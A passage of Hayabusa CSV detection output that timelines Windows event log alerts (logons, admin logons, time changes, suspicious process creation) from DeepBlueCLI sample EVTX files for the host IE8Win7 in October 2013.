+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not 